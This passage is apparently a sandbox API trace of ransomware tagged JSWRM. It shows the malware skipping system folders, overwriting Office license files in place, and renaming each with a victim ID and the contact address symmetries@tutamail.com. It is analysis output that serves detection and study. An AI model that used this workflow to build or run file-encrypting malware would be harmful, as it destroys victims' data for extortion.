(lpString1="PublisherR_OEM_Perp-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0109.595] lstrcmpiW (lpString1="PublisherR_OEM_Perp-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0109.595] lstrcmpiW (lpString1="PublisherR_OEM_Perp-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0109.595] lstrcmpiW (lpString1="PublisherR_OEM_Perp-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0109.595] lstrcmpiW (lpString1="PublisherR_OEM_Perp-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0109.595] lstrcmpiW (lpString1="PublisherR_OEM_Perp-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0109.595] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0109.596] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PublisherR_OEM_Perp-ul-oob.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0109.596] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0109.596] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PublisherR_OEM_Perp-ul-oob.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22d0a0, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PublisherR_OEM_Perp-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0109.596] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0109.596] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0109.596] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PublisherR_OEM_Perp-ul-oob.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0109.596] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0109.596] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PublisherR_OEM_Perp-ul-oob.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22d0d8, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PublisherR_OEM_Perp-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0109.596] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0109.596] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0109.596] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0109.596] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0109.596] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0109.596] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0109.596] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PublisherR_OEM_Perp-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\publisherr_oem_perp-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0109.597] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11602) returned 1 [0109.597] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.597] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d50) returned 0x24c1d0 [0109.597] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d50, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d50, lpOverlapped=0x0) returned 1 [0109.601] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.601] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d50, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d50, lpOverlapped=0x0) returned 1 [0109.601] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0109.602] CloseHandle (hObject=0x45c) returned 1 [0109.602] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0109.602] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0109.602] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0109.602] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0109.602] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0109.602] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0109.602] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0109.602] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0109.602] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0109.602] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0109.602] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b510 [0109.602] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f030 [0109.602] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b510 | out: hHeap=0x1e0000) returned 1 [0109.602] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0109.602] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PublisherR_OEM_Perp-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\publisherr_oem_perp-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PublisherR_OEM_Perp-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\publisherr_oem_perp-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0109.603] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f030 | out: hHeap=0x1e0000) returned 1 [0109.603] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0109.603] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0109.603] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0109.603] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0109.603] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xea8c47e1, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xea8c47e1, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xea9a962c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4deb, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="PublisherR_OEM_Perp-ul-phn.xrm-ms", cAlternateFileName="PUBLIS~2.XRM")) returned 1 [0109.603] lstrcmpiW (lpString1="PublisherR_OEM_Perp-ul-phn.xrm-ms", lpString2=".") returned 1 [0109.603] lstrcmpiW (lpString1="PublisherR_OEM_Perp-ul-phn.xrm-ms", lpString2="..") returned 1 [0109.603] lstrcmpiW (lpString1="PublisherR_OEM_Perp-ul-phn.xrm-ms", lpString2="...") returned 1 [0109.603] lstrcmpiW (lpString1="PublisherR_OEM_Perp-ul-phn.xrm-ms", lpString2="windows") returned -1 [0109.603] lstrcmpiW (lpString1="PublisherR_OEM_Perp-ul-phn.xrm-ms", lpString2="recovery") returned -1 [0109.603] lstrcmpiW (lpString1="PublisherR_OEM_Perp-ul-phn.xrm-ms", lpString2="perflogs") returned 1 [0109.603] lstrcmpiW (lpString1="PublisherR_OEM_Perp-ul-phn.xrm-ms", lpString2="documents and settings") returned 1 [0109.603] lstrcmpiW (lpString1="PublisherR_OEM_Perp-ul-phn.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0109.603] lstrcmpiW (lpString1="PublisherR_OEM_Perp-ul-phn.xrm-ms", lpString2="system volume information") returned -1 [0109.603] lstrcmpiW (lpString1="PublisherR_OEM_Perp-ul-phn.xrm-ms", lpString2="msocache") returned 1 [0109.603] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bda8 [0109.604] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PublisherR_OEM_Perp-ul-phn.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0109.604] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0109.604] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PublisherR_OEM_Perp-ul-phn.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22d260, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PublisherR_OEM_Perp-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0109.604] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bda8 | out: hHeap=0x1e0000) returned 1 [0109.604] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c698 [0109.604] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PublisherR_OEM_Perp-ul-phn.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0109.604] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0109.604] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PublisherR_OEM_Perp-ul-phn.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22cdc8, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PublisherR_OEM_Perp-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0109.604] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c698 | out: hHeap=0x1e0000) returned 1 [0109.604] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0109.604] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0109.604] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0109.604] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0109.604] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0109.604] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PublisherR_OEM_Perp-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\publisherr_oem_perp-ul-phn.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0109.605] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=19947) returned 1 [0109.605] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.605] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4de0) returned 0x24c1d0 [0109.605] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x4de0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x4de0, lpOverlapped=0x0) returned 1 [0109.608] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.608] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x4de0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x4de0, lpOverlapped=0x0) returned 1 [0109.608] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0109.608] CloseHandle (hObject=0x45c) returned 1 [0109.608] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2362f8 [0109.608] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0109.608] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0109.608] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0109.608] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0109.608] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0109.608] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0109.608] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a480 [0109.608] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a480, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0109.608] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a480 | out: hHeap=0x1e0000) returned 1 [0109.608] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b5d8 [0109.608] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23fa98 [0109.608] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b5d8 | out: hHeap=0x1e0000) returned 1 [0109.608] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0109.608] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PublisherR_OEM_Perp-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\publisherr_oem_perp-ul-phn.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PublisherR_OEM_Perp-ul-phn.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\publisherr_oem_perp-ul-phn.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0109.609] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fa98 | out: hHeap=0x1e0000) returned 1 [0109.609] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0109.609] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0109.609] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0109.609] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0109.609] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xea8c47e1, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xea8c47e1, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeab26d98, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2993, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="PublisherR_Retail-pl.xrm-ms", cAlternateFileName="PUBLIS~1.XRM")) returned 1 [0109.609] lstrcmpiW (lpString1="PublisherR_Retail-pl.xrm-ms", lpString2=".") returned 1 [0109.609] lstrcmpiW (lpString1="PublisherR_Retail-pl.xrm-ms", lpString2="..") returned 1 [0109.610] lstrcmpiW (lpString1="PublisherR_Retail-pl.xrm-ms", lpString2="...") returned 1 [0109.610] lstrcmpiW (lpString1="PublisherR_Retail-pl.xrm-ms", lpString2="windows") returned -1 [0109.610] lstrcmpiW (lpString1="PublisherR_Retail-pl.xrm-ms", lpString2="recovery") returned -1 [0109.610] lstrcmpiW (lpString1="PublisherR_Retail-pl.xrm-ms", lpString2="perflogs") returned 1 [0109.610] lstrcmpiW (lpString1="PublisherR_Retail-pl.xrm-ms", lpString2="documents and settings") returned 1 [0109.610] lstrcmpiW (lpString1="PublisherR_Retail-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0109.610] lstrcmpiW (lpString1="PublisherR_Retail-pl.xrm-ms", lpString2="system volume information") returned -1 [0109.610] lstrcmpiW (lpString1="PublisherR_Retail-pl.xrm-ms", lpString2="msocache") returned 1 [0109.610] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0109.610] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PublisherR_Retail-pl.xrm-ms", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0109.610] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0109.610] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PublisherR_Retail-pl.xrm-ms", cchWideChar=27, lpMultiByteStr=0x2410d8, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PublisherR_Retail-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 27 [0109.610] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0109.610] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d800 [0109.610] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PublisherR_Retail-pl.xrm-ms", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0109.610] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0109.610] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PublisherR_Retail-pl.xrm-ms", cchWideChar=27, lpMultiByteStr=0x241268, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PublisherR_Retail-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 27 [0109.610] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d800 | out: hHeap=0x1e0000) returned 1 [0109.610] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0109.610] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0109.610] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0109.610] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0109.610] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0109.610] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PublisherR_Retail-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\publisherr_retail-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0109.611] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=10643) returned 1 [0109.611] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.611] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2990) returned 0x24c1d0 [0109.611] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2990, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2990, lpOverlapped=0x0) returned 1 [0109.613] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.613] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2990, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2990, lpOverlapped=0x0) returned 1 [0109.613] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0109.613] CloseHandle (hObject=0x45c) returned 1 [0109.613] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0109.613] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0109.613] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0109.613] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0109.613] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0109.613] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0109.613] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0109.613] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0109.613] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0109.614] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0109.614] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0109.614] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e688 [0109.614] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0109.614] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0109.614] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PublisherR_Retail-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\publisherr_retail-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PublisherR_Retail-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\publisherr_retail-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0109.615] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e688 | out: hHeap=0x1e0000) returned 1 [0109.615] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0109.615] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0109.615] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0109.615] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0109.615] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, 